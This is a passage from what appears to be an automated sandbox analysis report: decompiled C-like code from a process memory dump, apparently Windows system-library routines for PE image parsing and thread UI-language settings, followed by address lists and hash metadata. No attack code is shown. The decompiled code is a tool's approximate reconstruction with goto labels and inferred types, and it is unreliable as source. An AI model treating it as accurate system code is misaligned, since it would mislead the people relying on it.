                                                                                                                          																			_v36 = 0xc000007b;
                                                                                                                          																			goto L71;
                                                                                                                          																		}
                                                                                                                          																	} else {
                                                                                                                          																		L102:
                                                                                                                          																		_t307 =  *(_t306 + 0x50);
                                                                                                                          																		goto L69;
                                                                                                                          																	}
                                                                                                                          																	goto L151;
                                                                                                                          																} else {
                                                                                                                          																	_t239 = L009DEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                                                          																	_t307 = _t239;
                                                                                                                          																	_v60 = _t307;
                                                                                                                          																	_v48 = _t307;
                                                                                                                          																	__eflags = _t307;
                                                                                                                          																	if(_t307 != 0) {
                                                                                                                          																		L70:
                                                                                                                          																		_t216 = _v36;
                                                                                                                          																	} else {
                                                                                                                          																		_push(_t239);
                                                                                                                          																		_push(0x14);
                                                                                                                          																		_push( &_v144);
                                                                                                                          																		_push(3);
                                                                                                                          																		_push(_v44);
                                                                                                                          																		_push(0xffffffff);
                                                                                                                          																		_t319 = E00A09730();
                                                                                                                          																		_v36 = _t319;
                                                                                                                          																		__eflags = _t319;
                                                                                                                          																		if(_t319 < 0) {
                                                                                                                          																			_t216 = 0xc000001f;
                                                                                                                          																			_v36 = 0xc000001f;
                                                                                                                          																			_t307 = _v60;
                                                                                                                          																		} else {
                                                                                                                          																			_t307 = _v132;
                                                                                                                          																			L69:
                                                                                                                          																			_v48 = _t307;
                                                                                                                          																			goto L70;
                                                                                                                          																		}
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          															L71:
                                                                                                                          															_v72 = _t307;
                                                                                                                          															_v84 = _t216;
                                                                                                                          															__eflags = _t216 - 0xc000007b;
                                                                                                                          															if(_t216 == 0xc000007b) {
                                                                                                                          																L150:
                                                                                                                          																_v8 = 0xfffffffe;
                                                                                                                          																_t211 = 0xc000007b;
                                                                                                                          															} else {
                                                                                                                          																_t344 = _t290 & 0xfffffffc;
                                                                                                                          																_v76 = _t344;
                                                                                                                          																__eflags = _v40 - _t344;
                                                                                                                          																if(_v40 <= _t344) {
                                                                                                                          																	goto L150;
                                                                                                                          																} else {
                                                                                                                          																	__eflags = _t307;
                                                                                                                          																	if(_t307 == 0) {
                                                                                                                          																		L75:
                                                                                                                          																		_t217 = 0;
                                                                                                                          																		_v104 = 0;
                                                                                                                          																		__eflags = _t366;
                                                                                                                          																		if(_t366 != 0) {
                                                                                                                          																			__eflags = _t290 & 0x00000001;
                                                                                                                          																			if((_t290 & 0x00000001) != 0) {
                                                                                                                          																				_t217 = 1;
                                                                                                                          																				_v104 = 1;
                                                                                                                          																			}
                                                                                                                          																			_t290 = _v44;
                                                                                                                          																			_v52 = _t290;
                                                                                                                          																		}
                                                                                                                          																		__eflags = _t217 - 1;
                                                                                                                          																		if(_t217 != 1) {
                                                                                                                          																			_t369 = 0;
                                                                                                                          																			_t218 = _v40;
                                                                                                                          																			goto L91;
                                                                                                                          																		} else {
                                                                                                                          																			_v64 = 0;
                                                                                                                          																			E009DE9C0(1, _t290, 0, 0,  &_v64);
                                                                                                                          																			_t309 = _v64;
                                                                                                                          																			_v108 = _t309;
                                                                                                                          																			__eflags = _t309;
                                                                                                                          																			if(_t309 == 0) {
                                                                                                                          																				goto L143;
                                                                                                                          																			} else {
                                                                                                                          																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                                                          																				__eflags = _t226 - 0x10b;
                                                                                                                          																				if(_t226 != 0x10b) {
                                                                                                                          																					__eflags = _t226 - 0x20b;
                                                                                                                          																					if(_t226 != 0x20b) {
                                                                                                                          																						goto L143;
                                                                                                                          																					} else {
                                                                                                                          																						_t371 =  *(_t309 + 0x98);
                                                                                                                          																						goto L83;
                                                                                                                          																					}
                                                                                                                          																				} else {
                                                                                                                          																					_t371 =  *(_t309 + 0x88);
                                                                                                                          																					L83:
                                                                                                                          																					__eflags = _t371;
                                                                                                                          																					if(_t371 != 0) {
                                                                                                                          																						_v80 = _t371 - _t356 + _t290;
                                                                                                                          																						_t310 = _v64;
                                                                                                                          																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                                                          																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                                                          																						_t311 = 0;
                                                                                                                          																						__eflags = 0;
                                                                                                                          																						while(1) {
                                                                                                                          																							_v120 = _t311;
                                                                                                                          																							_v116 = _t348;
                                                                                                                          																							__eflags = _t311 - _t292;
                                                                                                                          																							if(_t311 >= _t292) {
                                                                                                                          																								goto L143;
                                                                                                                          																							}
                                                                                                                          																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                                                          																							__eflags = _t371 - _t359;
                                                                                                                          																							if(_t371 < _t359) {
                                                                                                                          																								L98:
                                                                                                                          																								_t348 = _t348 + 0x28;
                                                                                                                          																								_t311 = _t311 + 1;
                                                                                                                          																								continue;
                                                                                                                          																							} else {
                                                                                                                          																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                                                          																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                                                          																									goto L98;
                                                                                                                          																								} else {
                                                                                                                          																									__eflags = _t348;
                                                                                                                          																									if(_t348 == 0) {
                                                                                                                          																										goto L143;
                                                                                                                          																									} else {
                                                                                                                          																										_t218 = _v40;
                                                                                                                          																										_t312 =  *_t218;
                                                                                                                          																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                                                          																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                                                          																											_v100 = _t359;
                                                                                                                          																											_t360 = _v108;
                                                                                                                          																											_t372 = L009D8F44(_v108, _t312);
                                                                                                                          																											__eflags = _t372;
                                                                                                                          																											if(_t372 == 0) {
                                                                                                                          																												goto L143;
                                                                                                                          																											} else {
                                                                                                                          																												_t290 = _v52;
                                                                                                                          																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00A03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                                                          																												_t307 = _v72;
                                                                                                                          																												_t344 = _v76;
                                                                                                                          																												_t218 = _v40;
                                                                                                                          																												goto L91;
                                                                                                                          																											}
                                                                                                                          																										} else {
                                                                                                                          																											_t290 = _v52;
                                                                                                                          																											_t307 = _v72;
                                                                                                                          																											_t344 = _v76;
                                                                                                                          																											_t369 = _v80;
                                                                                                                          																											L91:
                                                                                                                          																											_t358 = _a4;
                                                                                                                          																											__eflags = _t358;
                                                                                                                          																											if(_t358 == 0) {
                                                                                                                          																												L95:
                                                                                                                          																												_t308 = _a8;
                                                                                                                          																												__eflags = _t308;
                                                                                                                          																												if(_t308 != 0) {
                                                                                                                          																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                          																												}
                                                                                                                          																												_v8 = 0xfffffffe;
                                                                                                                          																												_t211 = _v84;
                                                                                                                          																											} else {
                                                                                                                          																												_t370 =  *_t218 - _t369 + _t290;
                                                                                                                          																												 *_t358 = _t370;
                                                                                                                          																												__eflags = _t370 - _t344;
                                                                                                                          																												if(_t370 <= _t344) {
                                                                                                                          																													L149:
                                                                                                                          																													 *_t358 = 0;
                                                                                                                          																													goto L150;
                                                                                                                          																												} else {
                                                                                                                          																													__eflags = _t307;
                                                                                                                          																													if(_t307 == 0) {
                                                                                                                          																														goto L95;
                                                                                                                          																													} else {
                                                                                                                          																														__eflags = _t370 - _t344 + _t307;
                                                                                                                          																														if(_t370 >= _t344 + _t307) {
                                                                                                                          																															goto L149;
                                                                                                                          																														} else {
                                                                                                                          																															goto L95;
                                                                                                                          																														}
                                                                                                                          																													}
                                                                                                                          																												}
                                                                                                                          																											}
                                                                                                                          																										}
                                                                                                                          																									}
                                                                                                                          																								}
                                                                                                                          																							}
                                                                                                                          																							goto L97;
                                                                                                                          																						}
                                                                                                                          																					}
                                                                                                                          																					goto L143;
                                                                                                                          																				}
                                                                                                                          																			}
                                                                                                                          																		}
                                                                                                                          																	} else {
                                                                                                                          																		__eflags = _v40 - _t307 + _t344;
                                                                                                                          																		if(_v40 >= _t307 + _t344) {
                                                                                                                          																			goto L150;
                                                                                                                          																		} else {
                                                                                                                          																			goto L75;
                                                                                                                          																		}
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          														L97:
                                                                                                                          														 *[fs:0x0] = _v20;
                                                                                                                          														return _t211;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										goto L46;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L151;
                                                                                                                          							}
                                                                                                                          							_t288 = _v164;
                                                                                                                          							_t366 = 0xc0000135;
                                                                                                                          							goto L41;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L151:
                                                                                                                          			}
                                                                                                                          0x00a2b324
                                                                                                                          0x00a2b326
                                                                                                                          0x00a2b332
                                                                                                                          0x00a2b347
                                                                                                                          0x00a2b34c
                                                                                                                          0x00a2b351
                                                                                                                          0x00a2b35a
                                                                                                                          0x00000000
                                                                                                                          0x00a2b328
                                                                                                                          0x00a2b328
                                                                                                                          0x00000000
                                                                                                                          0x00a2b328
                                                                                                                          0x00a2b326
                                                                                                                          0x009dd658
                                                                                                                          0x009dd658
                                                                                                                          0x009dd65b
                                                                                                                          0x009dd665
                                                                                                                          0x00000000
                                                                                                                          0x009dd66b
                                                                                                                          0x009dd66b
                                                                                                                          0x009dd66b
                                                                                                                          0x009dd66b
                                                                                                                          0x009dd66d
                                                                                                                          0x009dd672
                                                                                                                          0x009dd67a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009dd680
                                                                                                                          0x009dd686
                                                                                                                          0x009dd8ce
                                                                                                                          0x009dd8d4
                                                                                                                          0x009dd8dd
                                                                                                                          0x009dd8e0
                                                                                                                          0x009dd68c
                                                                                                                          0x009dd691
                                                                                                                          0x009dd69d
                                                                                                                          0x009dd6a2
                                                                                                                          0x009dd6a7
                                                                                                                          0x009dd6b0
                                                                                                                          0x009dd6b5
                                                                                                                          0x009dd6e0
                                                                                                                          0x009dd6b7
                                                                                                                          0x009dd6b7
                                                                                                                          0x009dd6b9
                                                                                                                          0x009dd6b9
                                                                                                                          0x009dd6bb
                                                                                                                          0x009dd6bd
                                                                                                                          0x009dd6ce
                                                                                                                          0x009dd6d0
                                                                                                                          0x009dd6d2
                                                                                                                          0x00a2b363
                                                                                                                          0x00a2b365
                                                                                                                          0x00000000
                                                                                                                          0x00a2b36b
                                                                                                                          0x00000000
                                                                                                                          0x00a2b36b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009dd6bf
                                                                                                                          0x009dd6bf
                                                                                                                          0x009dd6e5
                                                                                                                          0x009dd6e7
                                                                                                                          0x009dd6e9
                                                                                                                          0x009dd6ec
                                                                                                                          0x009dd6ec
                                                                                                                          0x009dd6ef
                                                                                                                          0x009dd6f5
                                                                                                                          0x009dd6f9
                                                                                                                          0x009dd6fb
                                                                                                                          0x009dd6fd
                                                                                                                          0x009dd701
                                                                                                                          0x009dd703
                                                                                                                          0x009dd70a
                                                                                                                          0x009dd70a
                                                                                                                          0x009dd701
                                                                                                                          0x009dd710
                                                                                                                          0x009dd710
                                                                                                                          0x009dd6c1
                                                                                                                          0x009dd6c1
                                                                                                                          0x009dd6c6
                                                                                                                          0x00a2b36d
                                                                                                                          0x00a2b36f
                                                                                                                          0x00000000
                                                                                                                          0x00a2b375
                                                                                                                          0x00a2b375
                                                                                                                          0x00a2b375
                                                                                                                          0x00000000
                                                                                                                          0x00a2b375
                                                                                                                          0x00000000
                                                                                                                          0x009dd6cc
                                                                                                                          0x009dd6d8
                                                                                                                          0x009dd6d8
                                                                                                                          0x009dd6d8
                                                                                                                          0x00000000
                                                                                                                          0x009dd6c6
                                                                                                                          0x009dd6bf
                                                                                                                          0x00000000
                                                                                                                          0x009dd6da
                                                                                                                          0x009dd6da
                                                                                                                          0x009dd716
                                                                                                                          0x009dd71b
                                                                                                                          0x009dd720
                                                                                                                          0x009dd726
                                                                                                                          0x009dd726
                                                                                                                          0x009dd72d
                                                                                                                          0x00000000
                                                                                                                          0x009dd733
                                                                                                                          0x009dd739
                                                                                                                          0x009dd742
                                                                                                                          0x009dd750
                                                                                                                          0x009dd758
                                                                                                                          0x009dd764
                                                                                                                          0x009dd776
                                                                                                                          0x009dd77a
                                                                                                                          0x009dd783
                                                                                                                          0x009dd928
                                                                                                                          0x009dd92c
                                                                                                                          0x009dd93d
                                                                                                                          0x009dd944
                                                                                                                          0x009dd94f
                                                                                                                          0x009dd954
                                                                                                                          0x009dd956
                                                                                                                          0x009dd95f
                                                                                                                          0x009dd961
                                                                                                                          0x009dd973
                                                                                                                          0x009dd973
                                                                                                                          0x009dd956
                                                                                                                          0x009dd944
                                                                                                                          0x009dd92c
                                                                                                                          0x009dd78b
                                                                                                                          0x00a2b394
                                                                                                                          0x009dd791
                                                                                                                          0x009dd798
                                                                                                                          0x00a2b3a3
                                                                                                                          0x00a2b3bb
                                                                                                                          0x00a2b3bb
                                                                                                                          0x009dd7a5
                                                                                                                          0x009dd866
                                                                                                                          0x009dd870
                                                                                                                          0x009dd892
                                                                                                                          0x009dd898
                                                                                                                          0x009dd89e
                                                                                                                          0x009dd8a0
                                                                                                                          0x009dd8a6
                                                                                                                          0x009dd8ac
                                                                                                                          0x009dd8ae
                                                                                                                          0x009dd8b4
                                                                                                                          0x009dd8b4
                                                                                                                          0x009dd8ae
                                                                                                                          0x009dd7a5
                                                                                                                          0x009dd78b
                                                                                                                          0x009dd7b1
                                                                                                                          0x00a2b3c5
                                                                                                                          0x00a2b3c5
                                                                                                                          0x009dd7c3
                                                                                                                          0x009dd7ca
                                                                                                                          0x009dd7e5
                                                                                                                          0x009dd7eb
                                                                                                                          0x009dd8eb
                                                                                                                          0x009dd8ed
                                                                                                                          0x00000000
                                                                                                                          0x009dd8f3
                                                                                                                          0x009dd8f3
                                                                                                                          0x009dd8f3
                                                                                                                          0x00000000
                                                                                                                          0x009dd8ed
                                                                                                                          0x009dd7cc
                                                                                                                          0x009dd7cc
                                                                                                                          0x009dd7d2
                                                                                                                          0x00000000
                                                                                                                          0x009dd7d4
                                                                                                                          0x009dd7d4
                                                                                                                          0x009dd7d7
                                                                                                                          0x009dd7df
                                                                                                                          0x00a2b3d4
                                                                                                                          0x00a2b3d9
                                                                                                                          0x00a2b3dc
                                                                                                                          0x00a2b3dc
                                                                                                                          0x00a2b3df
                                                                                                                          0x00a2b3e2
                                                                                                                          0x00a2b468
                                                                                                                          0x00a2b46d
                                                                                                                          0x00a2b46f
                                                                                                                          0x00a2b46f
                                                                                                                          0x00a2b475
                                                                                                                          0x009dd8f8
                                                                                                                          0x009dd8f9
                                                                                                                          0x009dd8fd
                                                                                                                          0x00a2b3e8
                                                                                                                          0x00a2b3e8
                                                                                                                          0x00a2b3eb
                                                                                                                          0x00a2b3ed
                                                                                                                          0x00000000
                                                                                                                          0x00a2b3ef
                                                                                                                          0x00a2b3ef
                                                                                                                          0x00a2b3f1
                                                                                                                          0x00a2b3f4
                                                                                                                          0x00a2b3fe
                                                                                                                          0x00a2b404
                                                                                                                          0x00a2b409
                                                                                                                          0x00a2b40e
                                                                                                                          0x00a2b410
                                                                                                                          0x00a2b410
                                                                                                                          0x00a2b414
                                                                                                                          0x00a2b414
                                                                                                                          0x00a2b41b
                                                                                                                          0x009ddc8e
                                                                                                                          0x009ddc91
                                                                                                                          0x009ddc93
                                                                                                                          0x009ddcce
                                                                                                                          0x009ddcce
                                                                                                                          0x009ddc95
                                                                                                                          0x009ddc9c
                                                                                                                          0x009ddc6e
                                                                                                                          0x009ddc72
                                                                                                                          0x009ddc75
                                                                                                                          0x009ddc77
                                                                                                                          0x009ddc79
                                                                                                                          0x00a2b551
                                                                                                                          0x00a2b551
                                                                                                                          0x00000000
                                                                                                                          0x009ddc7f
                                                                                                                          0x009ddc7f
                                                                                                                          0x009ddc81
                                                                                                                          0x00000000
                                                                                                                          0x009ddc83
                                                                                                                          0x009ddc86
                                                                                                                          0x009ddc88
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ddc88
                                                                                                                          0x009ddc81
                                                                                                                          0x009ddc79
                                                                                                                          0x009ddc6c
                                                                                                                          0x009ddc55
                                                                                                                          0x009ddc47
                                                                                                                          0x009ddc43
                                                                                                                          0x00000000
                                                                                                                          0x009ddc36
                                                                                                                          0x009ddc23
                                                                                                                          0x00000000
                                                                                                                          0x009ddbff
                                                                                                                          0x009ddbf1
                                                                                                                          0x009ddbdf
                                                                                                                          0x009ddb8f
                                                                                                                          0x009ddb92
                                                                                                                          0x009ddb95
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ddb95
                                                                                                                          0x009ddb8d
                                                                                                                          0x009ddb85
                                                                                                                          0x009ddb74
                                                                                                                          0x009ddc9f
                                                                                                                          0x009ddca2
                                                                                                                          0x009ddcb0
                                                                                                                          0x009ddcb0
                                                                                                                          0x009ddad1
                                                                                                                          0x00a2b4e5
                                                                                                                          0x00a2b4c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009dd831
                                                                                                                          0x00000000
                                                                                                                          0x009dd800
                                                                                                                          0x00a2b47f
                                                                                                                          0x00a2b485
                                                                                                                          0x00000000
                                                                                                                          0x00a2b485
                                                                                                                          0x009dd665
                                                                                                                          0x009dd652
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0D$0+D
                                                                                                                          • API String ID: 0-4146248415
                                                                                                                          • Opcode ID: d6ddf3ad52def3b137565e84568d8a611952db18357afbf7f969655f7afd8528
                                                                                                                          • Instruction ID: d5152e2c288b1e139bd89b35733244b2764c5654ba232aec33dc69d898da0aaa
                                                                                                                          • Opcode Fuzzy Hash: d6ddf3ad52def3b137565e84568d8a611952db18357afbf7f969655f7afd8528
                                                                                                                          • Instruction Fuzzy Hash: 2FE1F670A42359CFDB24DF28C980BA9B7B5BF85304F1481EAE9099B392D774AD81CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E009FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                                                          				char _v5;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v17;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				char _v28;
                                                                                                                          				char _v32;
                                                                                                                          				signed int _v40;
                                                                                                                          				void* __ecx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t73;
                                                                                                                          				intOrPtr* _t75;
                                                                                                                          				signed int _t77;
                                                                                                                          				signed int _t79;
                                                                                                                          				signed int _t81;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				intOrPtr _t85;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          				signed int _t91;
                                                                                                                          				signed int _t94;
                                                                                                                          				signed int _t95;
                                                                                                                          				signed int _t96;
                                                                                                                          				signed int _t106;
                                                                                                                          				signed int _t108;
                                                                                                                          				signed int _t114;
                                                                                                                          				signed int _t116;
                                                                                                                          				signed int _t118;
                                                                                                                          				signed int _t122;
                                                                                                                          				signed int _t123;
                                                                                                                          				void* _t129;
                                                                                                                          				signed int _t130;
                                                                                                                          				void* _t132;
                                                                                                                          				intOrPtr* _t134;
                                                                                                                          				signed int _t138;
                                                                                                                          				signed int _t141;
                                                                                                                          				signed int _t147;
                                                                                                                          				intOrPtr _t153;
                                                                                                                          				signed int _t154;
                                                                                                                          				signed int _t155;
                                                                                                                          				signed int _t170;
                                                                                                                          				void* _t174;
                                                                                                                          				signed int _t176;
                                                                                                                          				signed int _t177;
                                                                                                                          
                                                                                                                          				_t129 = __ebx;
                                                                                                                          				_push(_t132);
                                                                                                                          				_push(__esi);
                                                                                                                          				_t174 = _t132;
                                                                                                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                                                          				if(_t73 >= 0) {
                                                                                                                          					L5:
                                                                                                                          					return _t73;
                                                                                                                          				} else {
                                                                                                                          					E009DEEF0(0xab7b60);
                                                                                                                          					_t134 =  *0xab7b84; // 0x77f07b80
                                                                                                                          					_t2 = _t174 + 0x24; // 0x24
                                                                                                                          					_t75 = _t2;
                                                                                                                          					if( *_t134 != 0xab7b80) {
                                                                                                                          						_push(3);
                                                                                                                          						asm("int 0x29");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						asm("int3");
                                                                                                                          						_push(0xab7b60);
                                                                                                                          						_t170 = _v8;
                                                                                                                          						_v28 = 0;
                                                                                                                          						_v40 = 0;
                                                                                                                          						_v24 = 0;
                                                                                                                          						_v17 = 0;
                                                                                                                          						_v32 = 0;
                                                                                                                          						__eflags = _t170 & 0xffff7cf2;
                                                                                                                          						if((_t170 & 0xffff7cf2) != 0) {
                                                                                                                          							L43:
                                                                                                                          							_t77 = 0xc000000d;
                                                                                                                          						} else {
                                                                                                                          							_t79 = _t170 & 0x0000000c;
                                                                                                                          							__eflags = _t79;
                                                                                                                          							if(_t79 != 0) {
                                                                                                                          								__eflags = _t79 - 0xc;
                                                                                                                          								if(_t79 == 0xc) {
                                                                                                                          									goto L43;
                                                                                                                          								} else {
                                                                                                                          									goto L9;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t170 = _t170 | 0x00000008;
                                                                                                                          								__eflags = _t170;
                                                                                                                          								L9:
                                                                                                                          								_t81 = _t170 & 0x00000300;
                                                                                                                          								__eflags = _t81 - 0x300;
                                                                                                                          								if(_t81 == 0x300) {
                                                                                                                          									goto L43;
                                                                                                                          								} else {
                                                                                                                          									_t138 = _t170 & 0x00000001;
                                                                                                                          									__eflags = _t138;
                                                                                                                          									_v24 = _t138;
                                                                                                                          									if(_t138 != 0) {
                                                                                                                          										__eflags = _t81;
                                                                                                                          										if(_t81 != 0) {
                                                                                                                          											goto L43;
                                                                                                                          										} else {
                                                                                                                          											goto L11;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										L11:
                                                                                                                          										_push(_t129);
                                                                                                                          										_t77 = E009D6D90( &_v20);
                                                                                                                          										_t130 = _t77;
                                                                                                                          										__eflags = _t130;
                                                                                                                          										if(_t130 >= 0) {
                                                                                                                          											_push(_t174);
                                                                                                                          											__eflags = _t170 & 0x00000301;
                                                                                                                          											if((_t170 & 0x00000301) == 0) {
                                                                                                                          												_t176 = _a8;
                                                                                                                          												__eflags = _t176;
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													L64:
                                                                                                                          													_t83 =  *[fs:0x18];
                                                                                                                          													_t177 = 0;
                                                                                                                          													__eflags =  *(_t83 + 0xfb8);
                                                                                                                          													if( *(_t83 + 0xfb8) != 0) {
                                                                                                                          														E009D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                                                          													}
                                                                                                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													asm("sbb edx, edx");
                                                                                                                          													_t114 = E00A68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                                                          													__eflags = _t114;
                                                                                                                          													if(_t114 < 0) {
                                                                                                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                                                          														E009CB150();
                                                                                                                          													}
                                                                                                                          													_t116 = E00A66D81(_t176,  &_v16);
                                                                                                                          													__eflags = _t116;
                                                                                                                          													if(_t116 >= 0) {
                                                                                                                          														__eflags = _v16 - 2;
                                                                                                                          														if(_v16 < 2) {
                                                                                                                          															L56:
                                                                                                                          															_t118 = E009D75CE(_v20, 5, 0);
                                                                                                                          															__eflags = _t118;
                                                                                                                          															if(_t118 < 0) {
                                                                                                                          																L67:
                                                                                                                          																_t130 = 0xc0000017;
                                                                                                                          																goto L32;
                                                                                                                          															} else {
                                                                                                                          																__eflags = _v12;
                                                                                                                          																if(_v12 == 0) {
                                                                                                                          																	goto L67;
                                                                                                                          																} else {
                                                                                                                          																	_t153 =  *0xab8638; // 0x0
                                                                                                                          																	_t122 = L009D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                                                          																	_t154 = _v12;
                                                                                                                          																	_t130 = _t122;
                                                                                                                          																	__eflags = _t130;
                                                                                                                          																	if(_t130 >= 0) {
                                                                                                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                                                          																		__eflags = _t123;
                                                                                                                          																		if(_t123 != 0) {
                                                                                                                          																			_t155 = _a12;
                                                                                                                          																			__eflags = _t155;
                                                                                                                          																			if(_t155 != 0) {
                                                                                                                          																				 *_t155 = _t123;
                                                                                                                          																			}
                                                                                                                          																			goto L64;
                                                                                                                          																		} else {
                                                                                                                          																			E009D76E2(_t154);
                                                                                                                          																			goto L41;
                                                                                                                          																		}
                                                                                                                          																	} else {
                                                                                                                          																		E009D76E2(_t154);
                                                                                                                          																		_t177 = 0;
                                                                                                                          																		goto L18;
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														} else {
                                                                                                                          															__eflags =  *_t176;
                                                                                                                          															if( *_t176 != 0) {
                                                                                                                          																goto L56;
                                                                                                                          															} else {
                                                                                                                          																__eflags =  *(_t176 + 2);
                                                                                                                          																if( *(_t176 + 2) == 0) {
                                                                                                                          																	goto L64;
                                                                                                                          																} else {
                                                                                                                          																	goto L56;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													} else {
                                                                                                                          														_t130 = 0xc000000d;
                                                                                                                          														goto L32;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												goto L35;
                                                                                                                          											} else {
                                                                                                                          												__eflags = _a8;
                                                                                                                          												if(_a8 != 0) {
                                                                                                                          													_t77 = 0xc000000d;
                                                                                                                          												} else {
                                                                                                                          													_v5 = 1;
                                                                                                                          													L009FFCE3(_v20, _t170);
                                                                                                                          													_t177 = 0;
                                                                                                                          													__eflags = 0;
                                                                                                                          													L15:
                                                                                                                          													_t85 =  *[fs:0x18];
                                                                                                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                                                          														L18:
                                                                                                                          														__eflags = _t130;
                                                                                                                          														if(_t130 != 0) {
                                                                                                                          															goto L32;
                                                                                                                          														} else {
                                                                                                                          															__eflags = _v5 - _t130;
                                                                                                                          															if(_v5 == _t130) {
                                                                                                                          																goto L32;
                                                                                                                          															} else {
                                                                                                                          																_t86 =  *[fs:0x18];
                                                                                                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                                                          																}
                                                                                                                          																__eflags = _t177;
                                                                                                                          																if(_t177 == 0) {
                                                                                                                          																	L31:
                                                                                                                          																	__eflags = 0;
                                                                                                                          																	L009D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                                                          																	goto L32;
                                                                                                                          																} else {
                                                                                                                          																	__eflags = _v24;
                                                                                                                          																	_t91 =  *(_t177 + 0x20);
                                                                                                                          																	if(_v24 != 0) {
                                                                                                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                                                          																		goto L31;
                                                                                                                          																	} else {
                                                                                                                          																		_t141 = _t91 & 0x00000040;
                                                                                                                          																		__eflags = _t170 & 0x00000100;
                                                                                                                          																		if((_t170 & 0x00000100) == 0) {
                                                                                                                          																			__eflags = _t141;
                                                                                                                          																			if(_t141 == 0) {
                                                                                                                          																				L74:
                                                                                                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                                                          																				goto L27;
                                                                                                                          																			} else {
                                                                                                                          																				_t177 = E009FFD22(_t177);
                                                                                                                          																				__eflags = _t177;
                                                                                                                          																				if(_t177 == 0) {
                                                                                                                          																					goto L42;
                                                                                                                          																				} else {
                                                                                                                          																					_t130 = E009FFD9B(_t177, 0, 4);
                                                                                                                          																					__eflags = _t130;
                                                                                                                          																					if(_t130 != 0) {
                                                                                                                          																						goto L42;
                                                                                                                          																					} else {
                                                                                                                          																						_t68 = _t177 + 0x20;
